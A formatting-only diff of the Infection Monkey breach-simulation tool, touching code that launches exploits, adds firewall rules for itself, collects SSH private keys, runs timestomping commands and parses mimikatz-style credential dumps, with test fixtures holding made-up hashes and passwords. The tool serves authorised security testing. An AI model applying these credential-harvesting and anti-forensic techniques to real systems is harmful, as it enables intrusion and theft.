time_to_sleep
) )
time.sleep(time_to_sleep) time.sleep(time_to_sleep)
@ -346,7 +344,7 @@ class InfectionMonkey(object):
startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE startupinfo.wShowWindow = SW_HIDE
subprocess.Popen( subprocess.Popen(
DELAY_DELETE_CMD % {"file_path":sys.executable}, DELAY_DELETE_CMD % {"file_path": sys.executable},
stdin=None, stdin=None,
stdout=None, stdout=None,
stderr=None, stderr=None,
@ -398,8 +396,7 @@ class InfectionMonkey(object):
return True return True
else: else:
LOG.info( LOG.info(
"Failed exploiting %r with exploiter %s", machine, "Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
exploiter.__class__.__name__
) )
except ExploitingVulnerableMachineError as exc: except ExploitingVulnerableMachineError as exc:
LOG.error( LOG.error(
@ -458,8 +455,7 @@ class InfectionMonkey(object):
""" """
if not ControlClient.find_server(default_tunnel=self._default_tunnel): if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException( raise PlannedShutdownException(
"Monkey couldn't find server with {} default tunnel.".format( "Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
self._default_tunnel)
) )
self._default_server = WormConfiguration.current_server self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server) LOG.debug("default server set to: %s" % self._default_server)


@ -58,7 +58,7 @@ class WinAdvFirewall(FirewallApp):
def add_firewall_rule( def add_firewall_rule(
self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
): ):
netsh_args = {"name":name, "dir":direction, "action":action, "program":program} netsh_args = {"name": name, "dir": direction, "action": action, "program": program}
netsh_args.update(kwargs) netsh_args.update(kwargs)
try: try:
if _run_netsh_cmd("advfirewall firewall add rule", netsh_args): if _run_netsh_cmd("advfirewall firewall add rule", netsh_args):
@ -70,7 +70,7 @@ class WinAdvFirewall(FirewallApp):
return None return None
def remove_firewall_rule(self, name="Firewall", **kwargs): def remove_firewall_rule(self, name="Firewall", **kwargs):
netsh_args = {"name":name} netsh_args = {"name": name}
netsh_args.update(kwargs) netsh_args.update(kwargs)
try: try:
@ -132,7 +132,7 @@ class WinFirewall(FirewallApp):
program=sys.executable, program=sys.executable,
**kwargs, **kwargs,
): ):
netsh_args = {"name":name, "mode":mode, "program":program} netsh_args = {"name": name, "mode": mode, "program": program}
netsh_args.update(kwargs) netsh_args.update(kwargs)
try: try:
@ -153,7 +153,7 @@ class WinFirewall(FirewallApp):
program=sys.executable, program=sys.executable,
**kwargs, **kwargs,
): ):
netsh_args = {"program":program} netsh_args = {"program": program}
netsh_args.update(kwargs) netsh_args.update(kwargs)
try: try:
if _run_netsh_cmd("firewall delete %s" % rule, netsh_args): if _run_netsh_cmd("firewall delete %s" % rule, netsh_args):


@ -52,7 +52,6 @@ if is_windows_os():
local_hostname = socket.gethostname() local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2] return socket.gethostbyname_ex(local_hostname)[2]
def get_routes(): def get_routes():
raise NotImplementedError() raise NotImplementedError()
@ -60,12 +59,10 @@ if is_windows_os():
else: else:
from fcntl import ioctl from fcntl import ioctl
def local_ips(): def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()] valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips return valid_ips
def get_routes(): # based on scapy implementation for route parsing def get_routes(): # based on scapy implementation for route parsing
try: try:
f = open("/proc/net/route", "r") f = open("/proc/net/route", "r")


@ -17,21 +17,21 @@ class PostgreSQLFinger(HostFinger):
# Class related consts # Class related consts
_SCANNED_SERVICE = "PostgreSQL" _SCANNED_SERVICE = "PostgreSQL"
POSTGRESQL_DEFAULT_PORT = 5432 POSTGRESQL_DEFAULT_PORT = 5432
CREDS = {"username":ID_STRING, "password":ID_STRING} CREDS = {"username": ID_STRING, "password": ID_STRING}
CONNECTION_DETAILS = { CONNECTION_DETAILS = {
"ssl_conf":"SSL is configured on the PostgreSQL server.\n", "ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n", "ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n", "all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n", "all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR " "selected_ssl": "SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n", "non-SSL usage is forced.\n",
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR " "selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n", "SSL usage is forced.\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n", "only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
} }
RELEVANT_EX_SUBSTRINGS = { RELEVANT_EX_SUBSTRINGS = {
"no_auth":"password authentication failed", "no_auth": "password authentication failed",
"no_entry":"entry for host", # "no pg_hba.conf entry for host" but filename may be diff "no_entry": "entry for host", # "no pg_hba.conf entry for host" but filename may be diff
} }
def get_host_fingerprint(self, host): def get_host_fingerprint(self, host):


@ -169,7 +169,7 @@ class SMBFinger(HostFinger):
os_version, service_client = tuple( os_version, service_client = tuple(
[ [
e.replace(b"\x00", b"").decode() e.replace(b"\x00", b"").decode()
for e in data[47 + length:].split(b"\x00\x00\x00")[:2] for e in data[47 + length :].split(b"\x00\x00\x00")[:2]
] ]
) )


@ -5,35 +5,35 @@ from infection_monkey.network.postgresql_finger import PostgreSQLFinger
IRRELEVANT_EXCEPTION_STRING = "This is an irrelevant exception string." IRRELEVANT_EXCEPTION_STRING = "This is an irrelevant exception string."
_RELEVANT_EXCEPTION_STRING_PARTS = { _RELEVANT_EXCEPTION_STRING_PARTS = {
"pwd_auth_failed":'FATAL: password authentication failed for user "root"', "pwd_auth_failed": 'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",' "ssl_on_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL on', 'user "random", database "postgres", SSL on',
"ssl_off_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",' "ssl_off_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL off', 'user "random", database "postgres", SSL off',
} }
_RELEVANT_EXCEPTION_STRINGS = { _RELEVANT_EXCEPTION_STRINGS = {
"pwd_auth_failed":_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], "pwd_auth_failed": _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found":_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"], "ssl_off_entry_not_found": _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed":"\n".join( "pwd_auth_failed_pwd_auth_failed": "\n".join(
[ [
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
] ]
), ),
"pwd_auth_failed_ssl_off_entry_not_found":"\n".join( "pwd_auth_failed_ssl_off_entry_not_found": "\n".join(
[ [
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"], _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
] ]
), ),
"ssl_on_entry_not_found_pwd_auth_failed":"\n".join( "ssl_on_entry_not_found_pwd_auth_failed": "\n".join(
[ [
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"], _RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
] ]
), ),
"ssl_on_entry_not_found_ssl_off_entry_not_found":"\n".join( "ssl_on_entry_not_found_ssl_off_entry_not_found": "\n".join(
[ [
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"], _RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"], _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
@ -42,48 +42,48 @@ _RELEVANT_EXCEPTION_STRINGS = {
} }
_RESULT_STRINGS = { _RESULT_STRINGS = {
"ssl_conf":"SSL is configured on the PostgreSQL server.\n", "ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n", "ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n", "all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n", "all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR " "selected_ssl": "SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n", "non-SSL usage is forced.\n",
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR " "selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n", "SSL usage is forced.\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n", "only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
} }
RELEVANT_EXCEPTIONS_WITH_EXPECTED_RESULTS = { RELEVANT_EXCEPTIONS_WITH_EXPECTED_RESULTS = {
# SSL not configured, all non-SSL allowed # SSL not configured, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]:[ _RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_not_conf"], _RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["all_non_ssl"], _RESULT_STRINGS["all_non_ssl"],
], ],
# SSL not configured, selected non-SSL allowed # SSL not configured, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]:[ _RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_not_conf"], _RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["selected_non_ssl"], _RESULT_STRINGS["selected_non_ssl"],
], ],
# all SSL allowed, all non-SSL allowed # all SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]:[ _RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_conf"], _RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"], _RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["all_non_ssl"], _RESULT_STRINGS["all_non_ssl"],
], ],
# all SSL allowed, selected non-SSL allowed # all SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]:[ _RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_conf"], _RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"], _RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["selected_non_ssl"], _RESULT_STRINGS["selected_non_ssl"],
], ],
# selected SSL allowed, all non-SSL allowed # selected SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]:[ _RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_conf"], _RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["selected_ssl"], _RESULT_STRINGS["selected_ssl"],
_RESULT_STRINGS["all_non_ssl"], _RESULT_STRINGS["all_non_ssl"],
], ],
# selected SSL allowed, selected non-SSL allowed # selected SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]:[ _RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_conf"], _RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["only_selected"], _RESULT_STRINGS["only_selected"],
], ],


@ -81,8 +81,7 @@ class CommunicateAsNewUser(PBA):
""" """
if exit_status == 0: if exit_status == 0:
PostBreachTelem( PostBreachTelem(
self, self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
(CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
).send() ).send()
else: else:
PostBreachTelem( PostBreachTelem(


@ -9,6 +9,5 @@ class AccountDiscovery(PBA):
def __init__(self): def __init__(self):
linux_cmds, windows_cmds = get_commands_to_discover_accounts() linux_cmds, windows_cmds = get_commands_to_discover_accounts()
super().__init__( super().__init__(
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
windows_cmd=windows_cmds
) )


@ -62,8 +62,7 @@ class PBA(Plugin):
result = exec_funct() result = exec_funct()
if self.scripts_were_used_successfully(result): if self.scripts_were_used_successfully(result):
T1064Telem( T1064Telem(
ScanStatus.USED, ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action."
f"Scripts were used to execute {self.name} post breach action."
).send() ).send()
PostBreachTelem(self, result).send() PostBreachTelem(self, result).send()
else: else:


@ -1,9 +1,7 @@
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification\ from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import (
import (
get_linux_commands_to_modify_shell_startup_files, get_linux_commands_to_modify_shell_startup_files,
) )
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification\ from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import (
import (
get_windows_commands_to_modify_shell_startup_files, get_windows_commands_to_modify_shell_startup_files,
) )


@ -19,8 +19,7 @@ def get_windows_commands_to_modify_shell_startup_files():
STARTUP_FILES_PER_USER = [ STARTUP_FILES_PER_USER = [
"\\".join( "\\".join(
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [ SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
) )
for user in USERS for user in USERS
] ]


@ -13,7 +13,7 @@ CUSTOM_WINDOWS_FILENAME = "filename-for-windows"
def fake_monkey_dir_path(monkeypatch): def fake_monkey_dir_path(monkeypatch):
monkeypatch.setattr( monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.get_monkey_dir_path", "infection_monkey.post_breach.actions.users_custom_pba.get_monkey_dir_path",
lambda:MONKEY_DIR_PATH, lambda: MONKEY_DIR_PATH,
) )
@ -21,7 +21,7 @@ def fake_monkey_dir_path(monkeypatch):
def set_os_linux(monkeypatch): def set_os_linux(monkeypatch):
monkeypatch.setattr( monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os", "infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda:False, lambda: False,
) )
@ -29,7 +29,7 @@ def set_os_linux(monkeypatch):
def set_os_windows(monkeypatch): def set_os_windows(monkeypatch):
monkeypatch.setattr( monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os", "infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda:True, lambda: True,
) )


@ -10,5 +10,6 @@ def get_linux_timestomping_commands():
f"rm {TEMP_FILE} -f" f"rm {TEMP_FILE} -f"
] ]
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006 # Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md # /T1070.006.md


@ -4,5 +4,6 @@ TEMP_FILE = "monkey-timestomping-file.txt"
def get_windows_timestomping_commands(): def get_windows_timestomping_commands():
return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1" return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1"
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006 # Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md # /T1070.006.md


@ -38,11 +38,11 @@ class SSHCollector(object):
possibly hashed) possibly hashed)
""" """
return { return {
"name":name, "name": name,
"home_dir":home_dir, "home_dir": home_dir,
"public_key":None, "public_key": None,
"private_key":None, "private_key": None,
"known_hosts":None, "known_hosts": None,
} }
@staticmethod @staticmethod
@ -84,8 +84,7 @@ class SSHCollector(object):
info["private_key"] = private_key info["private_key"] = private_key
LOG.info("Found private key in %s" % private) LOG.info("Found private key in %s" % private)
T1005Telem( T1005Telem(
ScanStatus.USED, "SSH key", ScanStatus.USED, "SSH key", "Path: %s" % private
"Path: %s" % private
).send() ).send()
else: else:
continue continue

View File

@ -80,8 +80,8 @@ class InfoCollector(object):
""" """
LOG.debug("Reading subnets") LOG.debug("Reading subnets")
self.info["network_info"] = { self.info["network_info"] = {
"networks":get_host_subnets(), "networks": get_host_subnets(),
"netstat":NetstatCollector.get_netstat_info(), "netstat": NetstatCollector.get_netstat_info(),
} }
def get_azure_info(self): def get_azure_info(self):


@ -31,7 +31,7 @@ class AwsCollector(SystemInfoCollector):
info = {} info = {}
if aws.is_instance(): if aws.is_instance():
logger.info("Machine is an AWS instance") logger.info("Machine is an AWS instance")
info = {"instance_id":aws.get_instance_id()} info = {"instance_id": aws.get_instance_id()}
else: else:
logger.info("Machine is NOT an AWS instance") logger.info("Machine is NOT an AWS instance")


@ -21,4 +21,4 @@ class EnvironmentCollector(SystemInfoCollector):
super().__init__(name=ENVIRONMENT_COLLECTOR) super().__init__(name=ENVIRONMENT_COLLECTOR)
def collect(self) -> dict: def collect(self) -> dict:
return {"environment":get_monkey_environment()} return {"environment": get_monkey_environment()}


@ -12,4 +12,4 @@ class HostnameCollector(SystemInfoCollector):
super().__init__(name=HOSTNAME_COLLECTOR) super().__init__(name=HOSTNAME_COLLECTOR)
def collect(self) -> dict: def collect(self) -> dict:
return {"hostname":socket.getfqdn()} return {"hostname": socket.getfqdn()}


@ -30,23 +30,23 @@ class ProcessListCollector(SystemInfoCollector):
for process in psutil.process_iter(): for process in psutil.process_iter():
try: try:
processes[process.pid] = { processes[process.pid] = {
"name":process.name(), "name": process.name(),
"pid":process.pid, "pid": process.pid,
"ppid":process.ppid(), "ppid": process.ppid(),
"cmdline":" ".join(process.cmdline()), "cmdline": " ".join(process.cmdline()),
"full_image_path":process.exe(), "full_image_path": process.exe(),
} }
except (psutil.AccessDenied, WindowsError): except (psutil.AccessDenied, WindowsError):
# we may be running as non root and some processes are impossible to acquire in # we may be running as non root and some processes are impossible to acquire in
# Windows/Linux. # Windows/Linux.
# In this case we'll just add what we know. # In this case we'll just add what we know.
processes[process.pid] = { processes[process.pid] = {
"name":"null", "name": "null",
"pid":process.pid, "pid": process.pid,
"ppid":process.ppid(), "ppid": process.ppid(),
"cmdline":"ACCESS DENIED", "cmdline": "ACCESS DENIED",
"full_image_path":"null", "full_image_path": "null",
} }
continue continue
return {"process_list":processes} return {"process_list": processes}


@ -20,10 +20,10 @@ class NetstatCollector(object):
AF_INET6 = getattr(socket, "AF_INET6", object()) AF_INET6 = getattr(socket, "AF_INET6", object())
proto_map = { proto_map = {
(AF_INET, SOCK_STREAM):"tcp", (AF_INET, SOCK_STREAM): "tcp",
(AF_INET6, SOCK_STREAM):"tcp6", (AF_INET6, SOCK_STREAM): "tcp6",
(AF_INET, SOCK_DGRAM):"udp", (AF_INET, SOCK_DGRAM): "udp",
(AF_INET6, SOCK_DGRAM):"udp6", (AF_INET6, SOCK_DGRAM): "udp6",
} }
@staticmethod @staticmethod
@ -34,11 +34,11 @@ class NetstatCollector(object):
@staticmethod @staticmethod
def _parse_connection(c): def _parse_connection(c):
return { return {
"proto":NetstatCollector.proto_map[(c.family, c.type)], "proto": NetstatCollector.proto_map[(c.family, c.type)],
"local_address":c.laddr[0], "local_address": c.laddr[0],
"local_port":c.laddr[1], "local_port": c.laddr[1],
"remote_address":c.raddr[0] if c.raddr else None, "remote_address": c.raddr[0] if c.raddr else None,
"remote_port":c.raddr[1] if c.raddr else None, "remote_port": c.raddr[1] if c.raddr else None,
"status":c.status, "status": c.status,
"pid":c.pid, "pid": c.pid,
} }


@ -28,7 +28,7 @@ class SystemInfoCollectorsHandler(object):
"collected successfully.".format(len(self.collectors_list), successful_collections) "collected successfully.".format(len(self.collectors_list), successful_collections)
) )
SystemInfoTelem({"collectors":system_info_telemetry}).send() SystemInfoTelem({"collectors": system_info_telemetry}).send()
@staticmethod @staticmethod
def config_to_collectors_list() -> Sequence[SystemInfoCollector]: def config_to_collectors_list() -> Sequence[SystemInfoCollector]:


@ -22,5 +22,5 @@ class MimikatzCredentialCollector(object):
# Lets not use "." and "$" in keys, because it will confuse mongo. # Lets not use "." and "$" in keys, because it will confuse mongo.
# Ideally we should refactor island not to use a dict and simply parse credential list. # Ideally we should refactor island not to use a dict and simply parse credential list.
key = cred.username.replace(".", ",").replace("$", "") key = cred.username.replace(".", ",").replace("$", "")
cred_dict.update({key:cred.to_dict()}) cred_dict.update({key: cred.to_dict()})
return cred_dict return cred_dict


@ -8,123 +8,119 @@ from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import
class TestPypykatzHandler(TestCase): class TestPypykatzHandler(TestCase):
# Made up credentials, but structure of dict should be roughly the same # Made up credentials, but structure of dict should be roughly the same
PYPYKATZ_SESSION = { PYPYKATZ_SESSION = {
"authentication_id":555555, "authentication_id": 555555,
"session_id":3, "session_id": 3,
"username":"Monkey", "username": "Monkey",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"logon_server":"ReAlDoMaIn", "logon_server": "ReAlDoMaIn",
"logon_time":"2020-06-02T04:53:45.256562+00:00", "logon_time": "2020-06-02T04:53:45.256562+00:00",
"sid":"S-1-6-25-260123139-3611579848-5589493929-3021", "sid": "S-1-6-25-260123139-3611579848-5589493929-3021",
"luid":123086, "luid": 123086,
"msv_creds":[ "msv_creds": [
{ {
"username":"monkey", "username": "monkey",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"NThash":b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9", "NThash": b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash":None, "LMHash": None,
"SHAHash":b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`", "SHAHash": b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
} }
], ],
"wdigest_creds":[ "wdigest_creds": [
{ {
"credtype":"wdigest", "credtype": "wdigest",
"username":"monkey", "username": "monkey",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"password":"canyoufindme", "password": "canyoufindme",
"luid":123086, "luid": 123086,
} }
], ],
"ssp_creds":[ "ssp_creds": [
{ {
"credtype":"wdigest", "credtype": "wdigest",
"username":"monkey123", "username": "monkey123",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"password":"canyoufindme123", "password": "canyoufindme123",
"luid":123086, "luid": 123086,
} }
], ],
"livessp_creds":[ "livessp_creds": [
{ {
"credtype":"wdigest", "credtype": "wdigest",
"username":"monk3y", "username": "monk3y",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"password":"canyoufindm3", "password": "canyoufindm3",
"luid":123086, "luid": 123086,
} }
], ],
"dpapi_creds":[ "dpapi_creds": [
{ {
"credtype":"dpapi", "credtype": "dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f", "key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9", "f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da", "sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"dpapi", "credtype": "dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f", "key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9", "f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da", "sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"dpapi", "credtype": "dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f", "key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9", "f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da", "sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"dpapi", "credtype": "dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f", "key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9", "f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da", "sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086, "luid": 123086,
}, },
{"credtype":"dpapi", "key_guid":"9123-123ae123de4-121239-3123-421f"}, {"credtype": "dpapi", "key_guid": "9123-123ae123de4-121239-3123-421f"},
], ],
"kerberos_creds":[ "kerberos_creds": [
{ {
"credtype":"kerberos", "credtype": "kerberos",
"username":"monkey_kerb", "username": "monkey_kerb",
"password":None, "password": None,
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"luid":123086, "luid": 123086,
"tickets":[], "tickets": [],
} }
], ],
"credman_creds":[ "credman_creds": [
{ {
"credtype":"credman", "credtype": "credman",
"username":"monkey", "username": "monkey",
"domainname":"monkey.ad.monkey.com", "domainname": "monkey.ad.monkey.com",
"password":"canyoufindme2", "password": "canyoufindme2",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"credman", "credtype": "credman",
"username":"monkey@monkey.com", "username": "monkey@monkey.com",
"domainname":"moneky.monkey.com", "domainname": "moneky.monkey.com",
"password":"canyoufindme1", "password": "canyoufindme1",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"credman", "credtype": "credman",
"username":"test", "username": "test",
"domainname":"test.test.ts", "domainname": "test.test.ts",
"password":"canyoufindit", "password": "canyoufindit",
"luid":123086, "luid": 123086,
}, },
], ],
"tspkg_creds":[], "tspkg_creds": [],
} }
def test__get_creds_from_pypykatz_session(self): def test__get_creds_from_pypykatz_session(self):
@ -132,27 +128,27 @@ class TestPypykatzHandler(TestCase):
test_dicts = [ test_dicts = [
{ {
"username":"monkey", "username": "monkey",
"ntlm_hash":"31b73c59d7e0c089c031d6cfe0d16ae9", "ntlm_hash": "31b73c59d7e0c089c031d6cfe0d16ae9",
"password":"", "password": "",
"lm_hash":"", "lm_hash": "",
}, },
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme", "lm_hash":""}, {"username": "monkey", "ntlm_hash": "", "password": "canyoufindme", "lm_hash": ""},
{ {
"username":"monkey123", "username": "monkey123",
"ntlm_hash":"", "ntlm_hash": "",
"password":"canyoufindme123", "password": "canyoufindme123",
"lm_hash":"", "lm_hash": "",
}, },
